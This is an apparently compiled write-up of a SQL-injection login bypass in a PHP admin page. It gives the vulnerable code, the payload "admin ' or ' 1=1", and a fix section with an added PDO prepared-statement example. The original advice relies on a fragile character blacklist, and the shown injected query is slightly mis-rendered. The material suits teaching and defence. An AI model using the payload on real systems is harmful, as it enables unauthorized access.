- Code snippet from /admin/login.php
——————————————————————————————————————————
$postbruger = $_POST['username'];
$postpass = md5($_POST['password']);
// Both values are concatenated straight into the SQL text; a quote inside $postbruger
// closes the string literal and changes the structure of the query.
$resultat = mysql_query("SELECT * FROM " . $tablestart . "login WHERE brugernavn = '$postbruger' AND password = '$postpass'")
or die("
" . mysql_error() . "\n");
——————————————————————————————————————————
The variables aren't properly checked, so we can bypass this login. Let's inject the following username and password:
username : admin ' or ' 1=1
password : sirgod
We logged in. Why? Look, the code will become:
———————————————————————————————————————————
$resultat = mysql_query("SELECT * FROM " . $tablestart . "login WHERE brugernavn = 'admin' ' or ' 1=1 AND password = 'sirgod'")
———————————————————————————————————————————
Login bypassed. The username must be an existing username.
How to fix?
Simple way: don't allow special chars in variables. For numeric variables
use an (int) cast, for example $id = (int)$_GET['id'];
Another way: for non-numeric variables, filter all special chars used in
SQLi: – , . ( ) ' " _ + / *
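As an added example (not code from the original write-up or the application it describes), here is the same login lookup rewritten with PDO prepared statements. This is the robust fix behind the advice above: the user-supplied values are bound as parameters, so a quote in the username is treated as data rather than SQL syntax and no character filtering is needed. It assumes a PDO connection to the same $tablestart . "login" table (columns brugernavn and password, plus a hypothetical integer id column for the numeric case), keeps the snippet's md5 scheme so the comparison with the vulnerable code stays one-to-one, and the function names, prefix value and connection details are constructed for the example.

```php
<?php
// Added example, not the original application's code. Assumes a PDO connection
// to the table $tablestart . 'login' with columns brugernavn, password and a
// hypothetical integer column id. Function names and values are constructed.

declare(strict_types=1);

/**
 * Same lookup as the vulnerable snippet, but the user-supplied values never
 * become part of the SQL text: they are bound as parameters, so a quote in
 * the username is data, not syntax.
 */
function findLoginUser(PDO $db, string $tablestart, string $username, string $password): ?array
{
    // The table prefix is configuration, not user input, but identifiers cannot
    // be bound as parameters, so it is checked against an allow-list pattern.
    if (!preg_match('/^[A-Za-z0-9_]*$/', $tablestart)) {
        throw new InvalidArgumentException('invalid table prefix');
    }

    $sql = "SELECT * FROM {$tablestart}login WHERE brugernavn = :user AND password = :pass";
    $stmt = $db->prepare($sql);
    $stmt->execute([
        ':user' => $username,
        ':pass' => md5($password), // same hashing as the original snippet, kept for a like-for-like comparison
    ]);

    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

/**
 * The numeric case the text mentions: validate as an integer, then still bind.
 * filter_var rejects input such as "1 OR 1=1" outright instead of silently
 * truncating it to 1 the way a bare (int) cast would.
 */
function findById(PDO $db, string $tablestart, string $rawId): ?array
{
    if (!preg_match('/^[A-Za-z0-9_]*$/', $tablestart)) {
        throw new InvalidArgumentException('invalid table prefix');
    }

    $id = filter_var($rawId, FILTER_VALIDATE_INT);
    if ($id === false) {
        return null; // not an integer at all: refuse rather than coerce
    }

    $stmt = $db->prepare("SELECT * FROM {$tablestart}login WHERE id = :id");
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();

    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Usage (constructed connection details). Errors surface as exceptions that the
// caller logs server-side, instead of the original's die(mysql_error()), which
// printed database errors to the browser.
$db = new PDO('mysql:host=localhost;dbname=app', 'app', 'secret', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepares, not client-side quoting
]);

// The payload from the write-up is now looked up as a literal username and
// simply matches no row; the query structure cannot be altered by its content.
$user = findLoginUser($db, 'prefix_', "admin ' or ' 1=1", 'sirgod');
$byId = findById($db, 'prefix_', '1 OR 1=1');
```

With emulated prepares disabled, the SQL text and the parameter values reach the server separately, which is what makes the fix hold regardless of which characters the attacker sends; the character blacklist in the text is fragile by comparison because it has to anticipate every byte the database might interpret as syntax.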
How to use this code? Can anyone tell?